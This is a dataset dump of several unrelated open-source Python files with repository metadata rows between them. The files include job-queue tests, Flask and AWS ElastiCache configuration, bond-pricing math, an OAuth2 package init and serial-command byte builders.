self.assertEqual(info['size'], 2)
def test_addDead(self):
return self.assertEqual(1, 1)
def test_remove(self):
self.jobQueue.remove(self.jobId1)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 1)
self.jobQueue.remove(self.jobId2)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 0)
def test_delJob(self):
self.jobQueue.delJob(self.jobId1, 0)
info = self.jobQueue.getInfo()
self.assertEqual(info['size'], 1)
self.assertEqual(info['size_deadjobs'], 1)
self.jobQueue.delJob(self.jobId1, 1)
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 0)
return False
def test_get(self):
ret_job_1 = self.jobQueue.get(self.jobId1)
self.assertEqual(str(ret_job_1.id), self.jobId1)
ret_job_2 = self.jobQueue.get(self.jobId2)
self.assertEqual(str(ret_job_2.id), self.jobId2)
def test_getNextPendingJob(self):
self.jobQueue.assignJob(self.jobId2)
self.jobQueue.unassignJob(self.jobId1)
exp_id = self.jobQueue.getNextPendingJob()
self.assertMultiLineEqual(exp_id, self.jobId1)
def test_getNextPendingJobReuse(self):
return False
def test_assignJob(self):
self.jobQueue.assignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
self.assertFalse(job.isNotAssigned())
def test_unassignJob(self):
self.jobQueue.assignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
self.assertTrue(job.assigned)
self.jobQueue.unassignJob(self.jobId1)
job = self.jobQueue.get(self.jobId1)
return self.assertEqual(job.assigned, False)
def test_makeDead(self):
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 0)
self.jobQueue.makeDead(self.jobId1, "test")
info = self.jobQueue.getInfo()
self.assertEqual(info['size_deadjobs'], 1)
def test__getNextID(self):
init_id = self.jobQueue.nextID
for i in xrange(1, Config.MAX_JOBID + 100):
id = self.jobQueue._getNextID()
self.assertNotEqual(str(id), self.jobId1)
self.jobQueue.nextID = init_id
if __name__ == '__main__':
unittest.main()
| 29.681159 | 63 | 0.619141 | 460 | 4,096 | 5.386957 | 0.206522 | 0.150121 | 0.06134 | 0.074253 | 0.459645 | 0.368846 | 0.292978 | 0.292978 | 0.25908 | 0.139629 | 0 | 0.027898 | 0.264893 | 4,096 | 137 | 64 | 29.89781 | 0.795085 | 0 | 0 | 0.349057 | 0 | 0 | 0.049561 | 0 | 0 | 0 | 0 | 0 | 0.207547 | 0 | null | null | 0 | 0.04717 | null | null | 0.009434 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b6eaa68175183e78cc2a72bb734ce612395335a | 341 | py | Python | flask_webpack_bundle/config.py | briancappello/flask-webpack-bundle | 67896e6ade345e34721a8f9da156b65fc0646984 | [
"MIT"
] | null | null | null | flask_webpack_bundle/config.py | briancappello/flask-webpack-bundle | 67896e6ade345e34721a8f9da156b65fc0646984 | [
"MIT"
] | null | null | null | flask_webpack_bundle/config.py | briancappello/flask-webpack-bundle | 67896e6ade345e34721a8f9da156b65fc0646984 | [
"MIT"
] | null | null | null | import os
from flask_unchained import AppConfig
class Config(AppConfig):
WEBPACK_MANIFEST_PATH = os.path.join(
AppConfig.STATIC_FOLDER, 'assets', 'manifest.json')
class ProdConfig:
# use relative paths by default, ie, the same host as the backend
WEBPACK_ASSETS_HOST = ''
class StagingConfig(ProdConfig):
pass
| 18.944444 | 69 | 0.730205 | 43 | 341 | 5.651163 | 0.697674 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.193548 | 341 | 17 | 70 | 20.058824 | 0.883636 | 0.184751 | 0 | 0 | 0 | 0 | 0.068841 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.111111 | 0.222222 | 0 | 0.777778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0b6fda84960a8cf5a23f750128dc700eaee71d2f | 2,458 | py | Python | touchdown/aws/elasticache/replication_group.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 14 | 2015-01-05T18:18:04.000Z | 2022-02-07T19:35:12.000Z | touchdown/aws/elasticache/replication_group.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 106 | 2015-01-06T00:17:13.000Z | 2019-09-07T00:35:32.000Z | touchdown/aws/elasticache/replication_group.py | yaybu/touchdown | 70ecda5191ce2d095bc074dcb23bfa1584464814 | [
"Apache-2.0"
] | 5 | 2015-01-30T10:18:24.000Z | 2022-02-07T19:35:13.000Z | # Copyright 2014 Isotoma Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from touchdown.core import argument, output, serializers
from touchdown.core.plan import Plan
from ..common import SimpleApply, SimpleDescribe, SimpleDestroy
from .cache import BaseCacheCluster
class ReplicationGroup(BaseCacheCluster):
resource_name = "replication_group"
name = argument.String(
max=16, regex=r"[a-z1-9\-]{1,20}", field="ReplicationGroupId"
)
description = argument.String(
default=lambda resource: resource.name, field="ReplicationGroupDescription"
)
primary_cluster = argument.Resource(
"touchdown.aws.elasticache.cache.CacheCluster", field="PrimaryClusterId"
)
automatic_failover = argument.Boolean(field="AutomaticFailoverEnabled")
num_cache_clusters = argument.Integer(field="NumCacheClusters", update=False)
endpoint_address = output.Output(
serializers.Property("NodeGroups[0].PrimaryEndpoint.Address")
)
endpoint_port = output.Output(
serializers.Property("NodeGroups[0].PrimaryEndpoint.Port")
)
class Describe(SimpleDescribe, Plan):
resource = ReplicationGroup
service_name = "elasticache"
api_version = "2015-02-02"
describe_action = "describe_replication_groups"
describe_envelope = "ReplicationGroups"
describe_notfound_exception = "ReplicationGroupNotFoundFault"
key = "ReplicationGroupId"
class Apply(SimpleApply, Describe):
create_action = "create_replication_group"
update_action = "modify_replication_group"
waiter = "replication_group_available"
class Destroy(SimpleDestroy, Describe):
destroy_action = "delete_replication_group"
waiter = "replication_group_deleted"
def get_destroy_serializer(self):
return serializers.Dict(
ReplicationGroupId=serializers.Identifier(),
RetainPrimaryCluster=True if self.resource.primary_cluster else False,
)
| 32.773333 | 83 | 0.746542 | 269 | 2,458 | 6.702602 | 0.565056 | 0.033278 | 0.01442 | 0.017748 | 0.10538 | 0.063228 | 0.063228 | 0 | 0 | 0 | 0 | 0.012255 | 0.170057 | 2,458 | 74 | 84 | 33.216216 | 0.871569 | 0.223759 | 0 | 0 | 0 | 0 | 0.256072 | 0.182682 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023256 | false | 0 | 0.093023 | 0.023256 | 0.697674 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0b72b6b59c7098297806590340d0f99c8c866547 | 426 | py | Python | chartconvert/mpp.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | chartconvert/mpp.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | chartconvert/mpp.py | e-sailing/avnav | b3e8df4d6fa122b05309eee09197c716e29b64ec | [
"MIT"
] | null | null | null | #! /usr/bin/env python
#
# vim: ts=2 sw=2 et
#
import sys
#from wx.py.crust import Display
inchpm=39.3700
dpi=100
if len(sys.argv) >1:
dpi=int(sys.argv[1])
displaympp=1/(float(dpi)*inchpm)
print "display mpp=%f"%(displaympp)
mpp= 20037508.342789244 * 2 / 256
print "Level : mpp \t\t: scale"
for i in range(0,31):
scale=mpp/displaympp
print "level(%02d):%07.4f:\t\t1:%5.2f"%(i,mpp,scale)
mpp=mpp/2
| 16.384615 | 54 | 0.638498 | 78 | 426 | 3.487179 | 0.628205 | 0.051471 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133903 | 0.176056 | 426 | 25 | 55 | 17.04 | 0.641026 | 0.164319 | 0 | 0 | 0 | 0 | 0.216524 | 0.08547 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.076923 | null | null | 0.230769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b740ea892a08bb96379c733e82f7e4324d439a4 | 684 | py | Python | examples/driving_in_traffic/scenarios/loop/scenario.py | zbzhu99/SMARTS | 652aa23e71bd4e2732e2742140cfcd0ec082a7da | [
"MIT"
] | 2 | 2021-12-13T12:41:54.000Z | 2021-12-16T03:10:24.000Z | examples/driving_in_traffic/scenarios/loop/scenario.py | zbzhu99/SMARTS | 652aa23e71bd4e2732e2742140cfcd0ec082a7da | [
"MIT"
] | null | null | null | examples/driving_in_traffic/scenarios/loop/scenario.py | zbzhu99/SMARTS | 652aa23e71bd4e2732e2742140cfcd0ec082a7da | [
"MIT"
] | null | null | null | from pathlib import Path
from smarts.sstudio import gen_scenario
from smarts.sstudio import types as t
traffic = t.Traffic(
flows=[
t.Flow(
route=t.RandomRoute(),
rate=60 * 60,
actors={t.TrafficActor(name="car", vehicle_type=vehicle_type): 1},
)
for vehicle_type in [
"passenger",
"bus",
"coach",
"truck",
"trailer",
"passenger",
"bus",
"coach",
"truck",
"trailer",
]
]
)
gen_scenario(
t.Scenario(
traffic={"basic": traffic},
),
output_dir=Path(__file__).parent,
)
| 20.117647 | 78 | 0.483918 | 65 | 684 | 4.938462 | 0.569231 | 0.102804 | 0.105919 | 0.143302 | 0.180685 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012077 | 0.394737 | 684 | 33 | 79 | 20.727273 | 0.763285 | 0 | 0 | 0.333333 | 0 | 0 | 0.096491 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.066667 | 0.1 | 0 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0b7aa19dc4e53889b36908ba53b351bf9cbef5d2 | 6,444 | py | Python | calc/bond.py | RaphaelOneRepublic/financial-calculator | 2451b35a4cb52a6c254ae9fdae462dfebdc51e65 | [
"MIT"
] | 2 | 2020-12-10T13:00:43.000Z | 2020-12-19T16:59:48.000Z | calc/bond.py | RaphaelOneRepublic/financial-calculator | 2451b35a4cb52a6c254ae9fdae462dfebdc51e65 | [
"MIT"
] | null | null | null | calc/bond.py | RaphaelOneRepublic/financial-calculator | 2451b35a4cb52a6c254ae9fdae462dfebdc51e65 | [
"MIT"
] | null | null | null | import logging
from typing import Sequence
import numpy as np
from calc.optimize import root
class Bond(object):
"""
Represents a coupon paying bond.
Upon creation, the time to maturity, coupon periods per year, coupon rate must be provided.
If yield to maturity is provided, bond value would be ignored.
If yield to maturity is provided, bond value would be used to compute the implied yield to maturity.
Face value is assumed to be 100 if not provided.
"""
def __init__(self, T: float, R: float, m: int = 2, y: float = None, F: float = 100, B: float = None):
"""
construct a coupon paying bond
:param T: time to maturity in years
:param m: coupon payments per year
:param R: quoted annual coupon rate
:param y: (implied) yield to maturity
:param (optional) F: face value
:param B: traded bond price
"""
self._T = T
self._m = m
self._R = R
self._F = F
if y is not None:
self._y = y
self.__refresh_value_cache__()
elif B is not None:
self.B = B
else:
raise ValueError("one of yield to maturity or bond price must be provided")
def __refresh_value_cache__(self):
"""
recompute cached bond properties.
:return:
"""
self.__refresh_primary_cache__()
self._d2Bdy2 = np.sum(self._ts * self._ts * self._dcs)
self._duration = -self._dBdy / self._B
self._convexity = self._d2Bdy2 / self._B
def __refresh_primary_cache__(self):
"""
recompute frequently accessed bond properties except for duration, convexity and second order derivative.
:return:
"""
self._ts = np.arange(self._T, 0, -1 / self._m)[::-1]
self._cs = [self._R * self._F / 100 / self._m for _ in range(len(self._ts))]
self._cs[-1] += self._F
self._dcs = np.exp(-self._y * self._ts) * self._cs
self._B = np.sum(self._dcs)
self._dBdy = float(np.sum(-self._ts * self._dcs))
@property
def T(self):
"""
time to maturity
:return:
"""
return self._T
@T.setter
def T(self, value):
self._T = value
self.__refresh_value_cache__()
@property
def m(self):
"""
coupon payments per year
:return:
"""
return self._m
@m.setter
def m(self, value):
self._m = value
self.__refresh_value_cache__()
@property
def R(self):
"""
coupon rate
:return:
"""
return self._R
@R.setter
def R(self, value):
self._R = value
self.__refresh_value_cache__()
@property
def y(self):
"""
yield to maturity
:return:
"""
return self._y
@property
def ytm(self):
"""
yield to maturity
:return:
"""
return self._y
@property
def current(self):
"""
the current yield of the bond
= annual interest payment / bond price
:return:
"""
return self._R / 100 * self._F / self._B
@property
def bankeq(self):
"""
the bank equivalent yield of the bond
= (par - value) / par * 360 / days to maturity
:return:
"""
assert self._R == 0
return (self._F - self._B) / self._F * 360 / (self._T * 365)
@property
def cdeq(self):
"""
the money market equivalent yield of the bond
= (par - value) / value * 360 / days to maturity
:return:
"""
assert self._R == 0
return (self._F - self._B) / self._B * 360 / (self._T * 365)
@y.setter
def y(self, value):
self._y = value
self.__refresh_value_cache__()
@property
def B(self):
"""
bond value
:return:
"""
return self._B
@B.setter
def B(self, value):
def f(x):
self._y = x
self.__refresh_primary_cache__()
return self._B - value
def df(x: float):
return self._dBdy
try:
# compute implied yield to maturity with initial guess = 0.1
self.y = root(f, 0.1, df, epsilon=10e-9, delta=10e-9)
except RuntimeError:
logging.error("invalid bond value")
@property
def F(self):
"""
face value
:return:
"""
return self._F
@F.setter
def F(self, value):
self._F = value
self.__refresh_value_cache__()
@property
def duration(self):
"""
modified duration of the bond
:return:
"""
return self._duration
@property
def convexity(self):
"""
:convexity of the bond
:return:
"""
return self._convexity
def find_curve(bond, known: np.array, epsilon: float = 10e-10):
t = np.arange(bond.T, 0, - 1. / bond.m)[::-1]
c = np.array([bond.R / bond.m] * len(t))
c[-1] += bond.F
def f(x: float) -> float:
r = np.linspace(x, known[-1], len(t) + 1 - len(known), endpoint=False)[::-1]
rr = np.concatenate([known[1:], r])
return float(np.sum(c * np.exp(-rr * t))) - bond.B
def df(x: float) -> float:
r = np.linspace(x, known[-1], len(t) + 1 - len(known), endpoint=False)[::-1]
cc = c[len(known) - 1:]
tt = t[len(known) - 1:]
return float(np.sum(-cc * tt * np.exp(-r * tt) * np.arange(1, len(tt) + 1) / len(tt)))
x = root(f, 0.05, df=df)
r = np.linspace(x, known[-1], len(t) + 1 - len(known), endpoint=False)[::-1]
rr = np.concatenate([known[:], r])
return rr
def bootstrap(bonds: Sequence[Bond], overnight: float, epsilon: float = 10e-10):
"""
Bootstrap a zero rate curve from the given bonds and bond values.
Note that the bonds must have equal coupon payment periods (equal <m>s).
Zero rates at times for which we do not have a bond are calculated
by a linear line connecting the two nearest rates at times for which we do have a bond.
:param overnight:
:param epsilon:
:param bonds:
:return:
"""
bonds = sorted(bonds, key=lambda x: x.T)
known = [overnight]
for bond in bonds:
known = find_curve(bond, known)
return known
| 24.689655 | 113 | 0.542675 | 850 | 6,444 | 3.96 | 0.207059 | 0.047534 | 0.047534 | 0.037433 | 0.264409 | 0.247772 | 0.232917 | 0.144682 | 0.144682 | 0.144682 | 0 | 0.018824 | 0.340472 | 6,444 | 260 | 114 | 24.784615 | 0.773176 | 0.260708 | 0 | 0.221311 | 0 | 0 | 0.017548 | 0 | 0 | 0 | 0 | 0 | 0.016393 | 1 | 0.221311 | false | 0 | 0.032787 | 0.008197 | 0.409836 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b7b1e425f8017f791073b532d42d48a2786d924 | 171 | py | Python | 13.py | kwoshvick/project-euler | d27370b0f22b51ad9ccb15afa912983d8fd8be5c | [
"MIT"
] | null | null | null | 13.py | kwoshvick/project-euler | d27370b0f22b51ad9ccb15afa912983d8fd8be5c | [
"MIT"
] | null | null | null | 13.py | kwoshvick/project-euler | d27370b0f22b51ad9ccb15afa912983d8fd8be5c | [
"MIT"
] | null | null | null | file = open("13")
sum = 0
for numbers in file:
#print(numbers.rstrip())
numbers = int(numbers)
sum += numbers;
print(sum)
sum = str(sum)
print(sum[:10])
| 10.6875 | 28 | 0.596491 | 25 | 171 | 4.08 | 0.52 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038168 | 0.233918 | 171 | 15 | 29 | 11.4 | 0.740458 | 0.134503 | 0 | 0 | 0 | 0 | 0.013605 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.25 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b8210f4f1d6486c1ca027ea81ba3795882b8a8f | 3,433 | py | Python | tests/python/benchmarks/two_neighborhood_bench.py | sid17/weaver | f9074397ca854a777a873eaf409621de679f9749 | [
"BSD-3-Clause"
] | 163 | 2015-01-02T03:51:38.000Z | 2022-03-21T23:06:39.000Z | tests/python/benchmarks/two_neighborhood_bench.py | sid17/weaver | f9074397ca854a777a873eaf409621de679f9749 | [
"BSD-3-Clause"
] | 1 | 2015-04-08T23:17:06.000Z | 2015-04-24T15:25:26.000Z | tests/python/benchmarks/two_neighborhood_bench.py | sid17/weaver | f9074397ca854a777a873eaf409621de679f9749 | [
"BSD-3-Clause"
] | 20 | 2015-02-17T19:24:05.000Z | 2020-10-29T01:59:18.000Z | #! /usr/bin/env python
#
# ===============================================================
# Description: Two neighborhood benchmark
#
# Created: 2014-03-21 13:39:06
#
# Author: Ayush Dubey, dubey@cs.cornell.edu
#
# Copyright (C) 2013-2014, Cornell University, see the LICENSE
# file for licensing agreement
# ===============================================================
#
import random
import sys
import time
import threading
import weaver.client as client
import simple_client
random.seed(42)
num_edges = 1768149
edge_sources = [None] * num_edges
def choose_random_pair():
global edge_sources
return (edge_sources[random.randint(0, num_edges-1)], edge_sources[random.randint(0, num_edges-1)])
if (len(sys.argv) != 2):
print "want single extra arg for file to open"
assert(False)
f = open(sys.argv[1])
i = 0
for line in f:
if (line[0] is '#'):
continue
edge_sources[i] = int(line.split(" ")[0])
i += 1
print "done loading file"
num_started = 0
num_finished = 0
cv = threading.Condition()
num_nodes = 81306 # snap twitter-combined
read_percent = 95
# node handles are range(0, num_nodes)
num_vts = 1
num_clients = 100
requests_per_client = 200
def add_labels(c, idx):
global num_nodes
tx_id = c.begin_tx()
for i in range(num_nodes):
if i % num_clients is idx:
c.set_node_property(tx_id, i, 'name', str(i))
assert(c.end_tx(tx_id))
print "writing labels finished for client " + str(idx)
def exec_reads(reqs, sc, c, exec_time, idx):
global num_started
global cv
global num_clients
global num_finished
with cv:
while num_started < num_clients:
cv.wait()
start = time.time()
cnt = 0
for pair in reqs:
cnt += 1
if (random.randint(1,100) > read_percent) :
tx_id = c.begin_tx()
c.create_edge(tx_id, pair[0], pair[1])
assert(c.end_tx(tx_id))
else:
two_neighborhood = sc.two_neighborhood(pair[0], "name", caching = True)
end = time.time()
with cv:
num_finished += 1
cv.notify_all()
exec_time[idx] = end - start
clients = []
simple_clients = []
for i in range(num_clients):
clients.append(client.Client(client._CLIENT_ID + i, i % num_vts))
simple_clients.append(simple_client.simple_client(clients[i]))
reqs = []
for i in range(num_clients):
cl_reqs = []
for _ in range(requests_per_client):
cl_reqs.append(choose_random_pair())
reqs.append(cl_reqs)
exec_time = [0] * num_clients
threads = []
print "starting writes"
for i in range(num_clients):
thr = threading.Thread(target=add_labels, args=(clients[i], i))
thr.start()
threads.append(thr)
for thr in threads:
thr.join()
print "starting requests"
for i in range(num_clients):
thr = threading.Thread(target=exec_reads, args=(reqs[i], simple_clients[i], clients[i], exec_time, i))
thr.start()
threads.append(thr)
start_time = time.time()
with cv:
num_started = num_clients
cv.notify_all()
while num_finished < num_clients:
cv.wait()
end_time = time.time()
total_time = end_time-start_time
for thr in threads:
thr.join()
print 'Total time for ' + str(num_clients * requests_per_client) + 'requests = ' + str(total_time)
throughput = (num_clients * requests_per_client) / total_time
print 'Throughput = ' + str(throughput)
| 26.206107 | 106 | 0.633265 | 492 | 3,433 | 4.227642 | 0.286585 | 0.0625 | 0.014423 | 0.026442 | 0.241827 | 0.161538 | 0.101923 | 0.075962 | 0.043269 | 0.043269 | 0 | 0.02567 | 0.217011 | 3,433 | 130 | 107 | 26.407692 | 0.74814 | 0.132537 | 0 | 0.23 | 0 | 0 | 0.057712 | 0 | 0 | 0 | 0 | 0 | 0.03 | 0 | null | null | 0 | 0.06 | null | null | 0.07 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b83f0ab273b13a1a169d3aa5355aab90ac31ca1 | 313 | py | Python | setup.py | cfbolz/syntaxerrors | 1c7ecc8fd0d05253d5c55dee39802cfb86fb69f7 | [
"Apache-2.0",
"OpenSSL"
] | 5 | 2018-04-11T15:19:53.000Z | 2020-10-27T15:23:18.000Z | setup.py | cfbolz/syntaxerrors | 1c7ecc8fd0d05253d5c55dee39802cfb86fb69f7 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | setup.py | cfbolz/syntaxerrors | 1c7ecc8fd0d05253d5c55dee39802cfb86fb69f7 | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | from setuptools import setup, find_packages
setup(
name='syntaxerrors',
version='0.0.1',
description='Report better SyntaxErrors',
author='Carl Friedrich Bolz-Tereick',
author_email='cfbolz@gmx.de',
packages=['syntaxerrors'],
package_dir={'': 'src'},
include_package_data=True,
)
| 24.076923 | 45 | 0.686901 | 36 | 313 | 5.833333 | 0.805556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011538 | 0.169329 | 313 | 12 | 46 | 26.083333 | 0.796154 | 0 | 0 | 0 | 0 | 0 | 0.313099 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b88cc0b918db3b0b9bc55668bf46c025033b785 | 2,237 | py | Python | authlib/oauth2/rfc6749/__init__.py | geoffwhittington/authlib | 096f2a41f4fb18f9850427f07d556d4b9ab97383 | [
"BSD-3-Clause"
] | null | null | null | authlib/oauth2/rfc6749/__init__.py | geoffwhittington/authlib | 096f2a41f4fb18f9850427f07d556d4b9ab97383 | [
"BSD-3-Clause"
] | null | null | null | authlib/oauth2/rfc6749/__init__.py | geoffwhittington/authlib | 096f2a41f4fb18f9850427f07d556d4b9ab97383 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
"""
authlib.oauth2.rfc6749
~~~~~~~~~~~~~~~~~~~~~~
This module represents a direct implementation of
The OAuth 2.0 Authorization Framework.
https://tools.ietf.org/html/rfc6749
"""
from .wrappers import OAuth2Request, OAuth2Token, HttpRequest
from .errors import (
OAuth2Error,
AccessDeniedError,
MissingAuthorizationError,
InvalidGrantError,
InvalidClientError,
InvalidRequestError,
InvalidScopeError,
InsecureTransportError,
UnauthorizedClientError,
UnsupportedResponseTypeError,
UnsupportedGrantTypeError,
UnsupportedTokenTypeError,
# exceptions for clients
MissingCodeException,
MissingTokenException,
MissingTokenTypeException,
MismatchingStateException,
)
from .models import ClientMixin, AuthorizationCodeMixin, TokenMixin
from .authenticate_client import ClientAuthentication
from .authorization_server import AuthorizationServer
from .resource_protector import ResourceProtector, TokenValidator
from .token_endpoint import TokenEndpoint
from .grants import (
BaseGrant,
AuthorizationEndpointMixin,
TokenEndpointMixin,
AuthorizationCodeGrant,
ImplicitGrant,
ResourceOwnerPasswordCredentialsGrant,
ClientCredentialsGrant,
RefreshTokenGrant,
)
__all__ = [
'OAuth2Request', 'OAuth2Token', 'HttpRequest',
'OAuth2Error',
'AccessDeniedError',
'MissingAuthorizationError',
'InvalidGrantError',
'InvalidClientError',
'InvalidRequestError',
'InvalidScopeError',
'InsecureTransportError',
'UnauthorizedClientError',
'UnsupportedResponseTypeError',
'UnsupportedGrantTypeError',
'UnsupportedTokenTypeError',
'MissingCodeException',
'MissingTokenException',
'MissingTokenTypeException',
'MismatchingStateException',
'ClientMixin', 'AuthorizationCodeMixin', 'TokenMixin',
'ClientAuthentication',
'AuthorizationServer',
'ResourceProtector',
'TokenValidator',
'TokenEndpoint',
'BaseGrant',
'AuthorizationEndpointMixin',
'TokenEndpointMixin',
'AuthorizationCodeGrant',
'ImplicitGrant',
'ResourceOwnerPasswordCredentialsGrant',
'ClientCredentialsGrant',
'RefreshTokenGrant',
]
| 27.617284 | 67 | 0.743406 | 127 | 2,237 | 13.031496 | 0.598425 | 0.029003 | 0.042296 | 0.084592 | 0.496677 | 0.496677 | 0.496677 | 0.496677 | 0.298489 | 0.298489 | 0 | 0.009672 | 0.168082 | 2,237 | 80 | 68 | 27.9625 | 0.879635 | 0.097452 | 0 | 0 | 0 | 0 | 0.333166 | 0.174874 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.029851 | 0.119403 | 0 | 0.119403 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b88fa702aed7c893ac61d3d5a2bd66384c1a59d | 1,613 | py | Python | scripts/serial_command.py | philip-long/singletact-python-wrapper | 659796f614116db77f31d6b0cc1e0c963104948e | [
"MIT"
] | null | null | null | scripts/serial_command.py | philip-long/singletact-python-wrapper | 659796f614116db77f31d6b0cc1e0c963104948e | [
"MIT"
] | null | null | null | scripts/serial_command.py | philip-long/singletact-python-wrapper | 659796f614116db77f31d6b0cc1e0c963104948e | [
"MIT"
] | null | null | null | TIMEOUT=100
def GenerateWriteCommand(i2cAddress, ID, writeLocation, data):
i = 0
TIMEOUT = 100
command = bytearray(len(data)+15)
while (i < 4):
command[i] = 255
i += 1
command[4] = i2cAddress
command[5] = TIMEOUT
command[6] = ID
command[7] = 2
command[8] = writeLocation
command[9] = len(data)
command[(10 + len(data))] = 255
i = 0
while (i < len(data)):
command[(10 + i)] = data[i]
i += 1
i = 0
while (i < 4):
command[(11 + i) + len(data)] = 254
i += 1
return command
def GenerateReadCommand(i2cAddress, ID, readLocation, numToRead):
command = bytearray(16)
i = 0
TIMEOUT = 100
while (i < 4):
command[i] = 0xFF
i += 1
command[4] = i2cAddress
command[5] = TIMEOUT
command[6] = ID
command[7] = 0x01
command[8] = readLocation
command[9] = numToRead
command[10] = 0xFF
i = 0
while (i < 4):
command[(11 + i)] = 0xFE
i += 1
return command
def GenerateToggleCommand(i2cAddress, ID, writeLocation, data):
i = 0
command = bytearray(16 + 15)
while (i < 4):
command[i] = 255
i += 1
command[4] = i2cAddress
command[5] = TIMEOUT
command[6] = ID
command[7] = 3
command[8] = data
command[9] = 16
command[(10 + 16)] = 255
i = 0
while (i < 16):
command[(10 + i)] = 7
i += 1
i = 0
while (i < 4):
command[((11 + i) + 16)] = 254
i += 1
